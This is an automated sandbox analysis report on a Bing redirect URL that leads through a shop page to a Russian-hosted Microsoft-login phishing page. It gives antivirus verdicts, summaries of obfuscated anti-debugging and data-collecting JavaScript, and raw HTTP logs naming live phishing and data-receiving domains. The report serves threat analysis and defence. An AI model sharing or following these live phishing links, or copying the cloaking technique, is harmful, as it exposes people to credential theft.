Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy

Overview

General Information

Sample URL:https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cue
Analysis ID:1577974
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected suspicious Javascript

Classification

  • System is w10x64
  • chrome.exe (PID: 1012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2480,i,11789529794764029990,16469808625315113914,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://www.yuxingketang.com/collections/throw-blankets/Avira URL Cloud: Label: malware
Source: https://www.yuxingketang.com/collections/throw-blanketsAvira URL Cloud: Label: malware

Phishing

barindex
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://to.eemjhiulz.ru/zO7RFNG/... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some of the behaviors may be related to legitimate functionality, the overall risk level is elevated due to the presence of multiple suspicious indicators.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://to.eemjhiulz.ru/zO7RFNG/... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a potentially malicious domain. The combination of these behaviors strongly suggests that this script is intended to hinder security analysis and potentially carry out malicious activities.
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://to.eemjhiulz.ru/zO7RFNG/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which is likely a phishing attempt. Overall, this script demonstrates highly suspicious and malicious behavior.
Source: https://www.yuxingketang.com/collections/throw-blankets/#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=HTTP Parser: No favicon
Source: https://to.eemjhiulz.ru/zO7RFNG/HTTP Parser: No favicon
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /collections/throw-blankets HTTP/1.1Host: www.yuxingketang.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /collections/throw-blankets/ HTTP/1.1Host: www.yuxingketang.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zO7RFNG/ HTTP/1.1Host: to.eemjhiulz.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.yuxingketang.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://to.eemjhiulz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://to.eemjhiulz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://to.eemjhiulz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://to.eemjhiulz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://to.eemjhiulz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f42a9a00a2d7286&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: to.eemjhiulz.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://to.eemjhiulz.ru/zO7RFNG/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZXYU9uSG80Tk5zNURUZDNkKytMMXc9PSIsInZhbHVlIjoiTDdlbTlqUWJZSTA0V2JBZkJzZkR4bVhGaC9jVHBrRUVtcnMrY0E3eTU4cXdZMEMvSzRVTElTVHpXSEZqRURFZkgrV3hoekhOcTkyaVZlMVJmeFhBWkRtUmRBaWNycWw2OWllOFQzRW5EL3lVSzhvMXYxaXkxbmQ2Yld3VWVadG8iLCJtYWMiOiJjOTg2NWRkMGY1MmI0OThhN2NmYWY4YjU5ZTc1MDM4MjBhNTZiNDYyOTk3YjY0ODM4YjkxOGIwYjc2ODQ1YzI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqbHV3U1BQeG1yaGE2TVlVUlJEeFE9PSIsInZhbHVlIjoiVWs5R29rVzNHNjBHOHIzSUtXWUNqZXlqYXgxOWhCT0oxandtT29Qb2tLK3VoU2grVlNmcFQ2L3lPcC9Db1NlejVwZFdFRkQ2dGpCdHg4Q2s3T3RxNzdURnJXZERKY2tOZXlsVkhrdFJlT2RiaU1UYTV1TmozTTZla2cvOG53clkiLCJtYWMiOiI4MGNjYjU1ZTNmMDBmMzRmN2JjMTZhYzU2NDM2YTY3MDE0MmVmZjk4MWI4ODZhMDAwMzEzMWNiODlmZTU2YjkzIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f42a9a00a2d7286&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/160626399:1734560133:CxEHW6ls1QStHHo8izYqeiN0Qay4NLd4i9ydaBICDmw/8f42a9a00a2d7286/oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJb HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f42a9a00a2d7286/1734561715617/fdc9e8a73be2f5579622a47fd9ecfbe90b77079a2071ace2a9e0cdd32ad713a1/KjYAtqfG7Q3SeXb HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f42a9a00a2d7286/1734561715620/LUY0Aidy7FWWS4P HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f42a9a00a2d7286/1734561715620/LUY0Aidy7FWWS4P HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/160626399:1734560133:CxEHW6ls1QStHHo8izYqeiN0Qay4NLd4i9ydaBICDmw/8f42a9a00a2d7286/oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJb HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/160626399:1734560133:CxEHW6ls1QStHHo8izYqeiN0Qay4NLd4i9ydaBICDmw/8f42a9a00a2d7286/oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJb HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wgnznjsslbwyvhnqbjccoqwhnbRFXKIKWAMAGLJDBIOOCGGCVJLTMTGTLMTMJAXNZNLYVYKFNTT HTTP/1.1Host: jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://to.eemjhiulz.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://to.eemjhiulz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wgnznjsslbwyvhnqbjccoqwhnbRFXKIKWAMAGLJDBIOOCGGCVJLTMTGTLMTMJAXNZNLYVYKFNTT HTTP/1.1Host: jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.yuxingketang.com
Source: global trafficDNS traffic detected: DNS query: to.eemjhiulz.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ru
Source: global trafficDNS traffic detected: DNS query: www.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: google.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/160626399:1734560133:CxEHW6ls1QStHHo8izYqeiN0Qay4NLd4i9ydaBICDmw/8f42a9a00a2d7286/oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJb HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3187sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJbsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
